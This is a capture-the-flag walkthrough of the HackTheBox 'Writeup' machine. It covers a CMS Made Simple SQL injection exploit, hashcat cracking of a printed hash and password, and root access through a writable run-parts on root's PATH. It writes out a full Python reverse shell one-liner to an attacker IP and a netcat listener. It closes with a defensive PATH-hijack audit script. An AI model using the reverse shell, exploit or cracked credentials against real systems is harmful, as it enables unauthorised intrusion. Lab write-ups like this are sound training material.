Writeup (HackTheBox) Machine Walkthrough
We start off, as always, with an nmap scan to see which ports are open:
nmap -sC -sV -A 10.10.10.138
All we get is SSH and Apache, so we start with port 80.
So let's check robots.txt first; it gives us /writeup/.
We then get a sub-site named writeup, which we can go to via
we need to find in order to exploit it.
If we use Wappalyzer, it tells us that the site is built on 'CMS Made Simple'.
We can then use searchsploit and a Google search to find exploits for it that run against a website.
Usage (the option parsing from the top of 46635.py; the exploit is written for Python 2, and print() with a single argument behaves the same in Python 2 and 3):
import optparse

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
    # no target given: print the usage examples and stop
    print("[+] Specify an url target")
    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
    print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
    exit()
It takes -u for the URL, -w for the wordlist and -c to crack the password:
python 46635.py -u http://10.10.10.138/writeup/ -c -w rockyou.txt
In my case the password was not cracked by the script, so I used hashcat with -m 20 (md5($salt.$pass), input given as hash:salt) on
HASH=62def4866937f08cc13bab43bc5y4:5a599ef579066807
We then get the cracked password 'raykayjay9'. After that we can connect to the box over SSH and get the user flag.
User: d4e493fd4068afc9eb1*************
Now on to root.
Use pspy64.
After observing for a while, you find that a script is running.
This is run-parts, which is located through PATH; the run-parts that gets resolved is writable by our user and is executed by root.
So we just write a reverse shell into it.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.12.**",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Just replace my IP address with yours, and in another tab start a netcat listener:
nc -lvp 1234
Now open another tab and log in over SSH again, and we get a reverse shell as root in the netcat tab.
Root: eeba47f60b48ef92b7**************
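The root step above relies on a root-run job resolving run-parts through PATH from a directory our user can write to. The following audit script is an added example (not part of the original walkthrough): run as the low-privilege user, it reports whether a command invoked by bare name could be shadowed along a given PATH, either because a directory searched before the real binary is writable or because the binary itself is. The PATH string you pass (for example the PATH line of the crontab) is your own input; the script assumes nothing about the box.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: audit whether a command
# that a root job invokes by bare name (here "run-parts") could be shadowed
# by a file the current user can create or modify along the given PATH.

# Print the full path of the first executable named $1 found along the
# colon-separated directory list $2; return 1 if none is found.
resolve_in_path() {
    _cmd="$1"; _rest="$2:"
    while [ -n "$_rest" ]; do
        _dir="${_rest%%:*}"; _rest="${_rest#*:}"
        [ -n "$_dir" ] || _dir="."          # empty PATH entry means cwd
        if [ -x "$_dir/$_cmd" ]; then
            printf '%s\n' "$_dir/$_cmd"
            return 0
        fi
    done
    return 1
}

# Return 0 (and print why) if $1 can be hijacked along PATH $2: a directory
# searched before the genuine binary is writable, or the binary itself is.
# Return 1 when the genuine binary is reached first or nothing is found.
hijackable() {
    _cmd="$1"; _rest="$2:"
    while [ -n "$_rest" ]; do
        _dir="${_rest%%:*}"; _rest="${_rest#*:}"
        [ -n "$_dir" ] || _dir="."
        if [ -w "$_dir" ]; then
            printf 'writable dir %s is searched for %s\n' "$_dir" "$_cmd"
            return 0
        fi
        if [ -x "$_dir/$_cmd" ]; then
            if [ -w "$_dir/$_cmd" ]; then
                printf 'binary %s/%s is writable\n' "$_dir" "$_cmd"
                return 0
            fi
            return 1                          # genuine binary found first
        fi
    done
    return 1
}

# Stand-alone use: check run-parts against the calling shell's own PATH.
if [ "${1:-}" = "--demo" ]; then
    hijackable run-parts "$PATH" || echo "run-parts is not hijackable along \$PATH"
fi
```

Pass the PATH that the privileged job actually uses (the crontab's PATH line, not your login shell's) for a meaningful result; a hit means the directory permissions, not the job, need fixing.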